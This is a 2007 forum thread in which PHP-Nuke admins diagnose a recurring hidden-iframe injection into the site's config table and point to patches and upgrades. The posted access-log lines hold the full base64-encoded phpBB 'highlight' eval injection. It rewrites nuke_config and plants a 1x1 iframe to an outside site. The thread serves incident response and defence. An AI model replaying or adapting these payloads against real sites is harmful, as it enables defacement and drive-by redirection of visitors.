phpnuke config table sql injection?

Posted: Tue Sep 18, 2007 6:08 pm

I'm running a few php-nuke sites, two of my older versions heavily bastardized with various protection codes and updates, one is core 6.6 and the other later maybe 7.1 .. not sure. The first one can't be updated due to various legacy data.

Now in recent weeks have encounted 'hacks' into the config table of phpnuke with the addition of a 'hidden' iframe with a link/redirector to an alternate site. With a fully secure system it does nothing and running FF helps, I just go in and change back the data. But that's not ideal.

No other changes are being made to the config table or site. Any thoughts on how this is possible? or suggestions.

Thx in advance,

registered · Site Admin Joined: Jun 04, 2004 Posts: 6437

Have you checked your site access logs? That's usually the best place to start. You should be able to use NukeSentinel, even on older sites. Most cross site scripting can be stopped by using admin authentication - NukeSentinel has tools for that, but you can also find how to set it up by searching the forums here. You can usually see SQL injection (another common way to deface / gain inappropriate access to a site) in the site log. NukeSentinel will stop that, but not if the site has addons that bypass normal Nuke database access functions (some addons do that, and some galleries allow bad files to be uploaded if you're not careful). Hopefully that helps...

Posted: Tue Sep 18, 2007 10:40 pm

I'll be sure to look at the access logs tonight. Hopefully something striking will present itself in the mass of logs.

I don't have many, if any, additional addon to the core php-nuke of that period.

Posted: Tue Sep 18, 2007 11:56 pm

Well reviewed the logs and the only things out of the 'normal' attacks are the following. They appear to be coded, and I'm not sure of the correct process to decode them so I can read what they are doing. Any thoughts

Code:

 81.29.242.2 - /modules.php?name=Forums&file=viewtopic&t=5597&w=JGc9dXJsZGVjb2RlKGJhc2U2NF9kZWNvZGUoJF9HRVRbcTFdKSk7ICRkYi0%2Bc3FsX3F1ZXJ5KCJVUERBVEUgbnVrZV9jb25maWcgU0VUIGZvb3QxPSRnIik7&q1=JzxhIGhyZWY9aHR0cDovL3BocG51a2Uub3JnLyB0YXJnZXQ9Ymxhbms%2BPGltZyBoc3BhY2U9MTAgc3JjPWltYWdlcy9wb3dlcmVkL3Bvd2VyZWQ1LmpwZyBib3JkZXI9MD48L2E%2BPGJyPjxpZnJhbWUgc3JjPWh0dHA6Ly9wb3Jub3BlcnZvaS5jb20vaS5waHAgd2lkdGg9MSBoZWlnaHQ9MT48L2lmcmFtZT48IS0taTItLT4n&highlight=%2527%252eeval%2528urldecode%2528base64_decode%2528$_GET[w]%2529%2529%2529%252e%2527

and followed by this 35min laters

Code:

81.29.242.2 - /modules.php?name=Forums&file=viewtopic&t=5597&w=JGc9dXJsZGVjb2RlKGJhc2U2NF9kZWNvZGUoJF9HRVRbcTFdKSk7ICRkYi0%2Bc3FsX3F1ZXJ5KCJVUERBVEUgbnVrZV9jb25maWcgU0VUIGNvcHlyaWdodD0kZyIpOw%3D%3D&q1=JzxhIGhyZWY9aHR0cDovL3BocG51a2Uub3JnPjxmb250IGNsYXNzPWZvb3Rtc2dfbD5QSFAtTnVrZTwvZm9udD48L2E%2BIENvcHlyaWdodCAmY29weTsgMjAwNSBieSBGcmFuY2lzY28gQnVyemkuIFRoaXMgaXMgZnJlZSBzb2Z0d2FyZSBhbmQgeW91IG1heSByZWRpc3RyaWJ1dGUgaXQgdW5kZXIgdGhlIDxhIGhyZWY9aHR0cDovL3BocG51a2Uub3JnL2ZpbGVzL2dwbC50eHQ%2BPGZvbnQgY2xhc3M9Zm9vdG1zZ19sPkdQTDwvZm9udD48L2E%2BLiBQSFAtTnVrZSBjb21lcyB3aXRoIGFic29sdXRlbHkgbm8gd2FycmFudHkgZm9yIGRldGFpbHMgc2VlIHRoZSA8YSBocmVmPWh0dHA6Ly9waHBudWtlLm9yZy9maWxlcy9ncGwudHh0Pjxmb250IGNsYXNzPWZvb3Rtc2dfbD5saWNlbnNlPC9mb250PjwvYT4uPGlmcmFtZSBzcmM9aHR0cDovL3Bvcm5vcGVydm9pLmNvbS9pLnBocCB3aWR0aD0xIGhlaWdodD0xPjwvaWZyYW1lPjwhLS1pMi0tPic%3D&highlight=%2527%252eeval%2528urldecode%2528base64_decode%2528$_GET[w]%2529%2529%2529%252e%2527

Sorry about the large single line. I can see URLdecode in there. Thought they did return a 403 on the server.

-Rumbaar

registered · Posted: Wed Sep 19, 2007 1:58 am

Mm your log must be truncated. As you said, they are coded.

The injection itself is the highlight variable. That's a known issue with phpBB and has been secured. It should not affect BBToNuke 2.0.22

The injection itself does a simple
eval urldecode base64_decode of the $_GET['w] variable

Decoding that, it does another urldecode, base64_decode of the $_GET[q1] variable
Where that is, I have no idea.. I think your log doesn't display it all.
Finally it uses that decoded output to add code to your nuke_config table in the copyright field

That could be something simple like Javascript to grab your admin cookies and wreck havoc on your site.

Posted: Wed Sep 19, 2007 4:26 pm

Thx evaders,

Ok, I'm certainly not running BBtoNuke 2.0.22 Sad

Is there a 'simple' method to apply a patch or modification to my old, old version of phpBBnuke?

registered · Posted: Wed Sep 19, 2007 5:24 pm

Evaders, I'm curious about this exploit. Does that mean there was code in an older version of PHPBB that expected a w variable in $_GET, and the code would do an eval urldecode base64_decode of that variable???

Posted: Wed Sep 19, 2007 5:37 pm

Rumbaar did you searched already on google for your site.Sites with dangerous iframes are there special marked.However there are different kind of iframe attacks and some iframes are more or less harmless but I would just not run such an old nuke version because there isn´t a module within wich is secure and patch 2.9 for these versions is some years old.
You could update only your forum that works I did that in the past with my old nuke version.But if I where you I would upgrade to RavenNuke. I did that with 6.5 in place and everything works.

Posted: Wed Sep 19, 2007 6:02 pm

The exploit is in the "highlight" variable. It is the trigger that allows all the other nasty code to work. The $_GET variables used there are just extra payload, trying to obfuscate the exploit from your logs. You don't even notice the highlight= part unless you scroll to the end of that log

You need to get yourself secured. Get the latest Patched files for your version at http://www.nukeresources.com
And then upgrade your forums to the latest 2.0.22. The BBToNuke packages (from the same site) are what you want. No, they are not cumulative - you will have to install each sequentially.

That's going to be a lot of work. You can either
a) start with fresh Patched files and re-do your customizations
or
b) try to make the Patched changes directly to your current system.

It really depends on how much code changes you'd have to do, and whether you're familiar enough with the code to do it. I prefer solution A myself. Easier to redo customizations that you've already done.
Either way, get a good file difference program - I use WinMerge, its free!

Posted: Wed Sep 19, 2007 7:56 pm

I'm pretty quick in discovering the iframes Susann, so they don't last long enough for the Google spiders to catch and/or flag.

I'll look to nukeresources and see if I can patch it manually, it sounds like a long list of work.

I've tried to do A) evaders in the past, but with later character restrictions various 'allowable' username characters (mine and others) don't seem to be compatible with the 7.6 secure nuke. One of my newer sites uses 7.6 ravennuke, but previous two from older days don't. They are around from '03 and I wouldn't even begin to remember all the changes I've done since then.

With this 'payload' is the only place they can insert code is into the config table or is that just the ideal place. I mean can they inject into any table in the database?

Posted: Thu Sep 20, 2007 4:06 pm

They can inject any SQL, download and run other code. Thus the wide number of attacks against phpBB systems.

Posted: Thu Sep 20, 2007 5:55 pm

I've found the core php-nuke patches on that site, but can't seem to find the specific BBtoNuke patches though.

Posted: Thu Sep 20, 2007 11:40 pm

Search the Downloads with the specific BBToNuke version numbers.

If you confirm what phpNuke version you are using, and you've not done any upgrades before, this list contains what BBToNuke version the stock phpNuke came with. (Sorry this list hasn't been updated in a while)

http://evaders.swrebellion.com/modules.php?name=Index&readme=1#history
Look under the phpNuke column. The (2.0.xx) number is what you'd have currently.

So phpNuke 6.6 came with 2.0.2. I don't even know if there's a version standalone of 2.0.3. You're almost better off upgrading to at least phpNuke 7.6 with stock 2.0.10. Then going for BBToNuke 2.0.12 - 2.0.22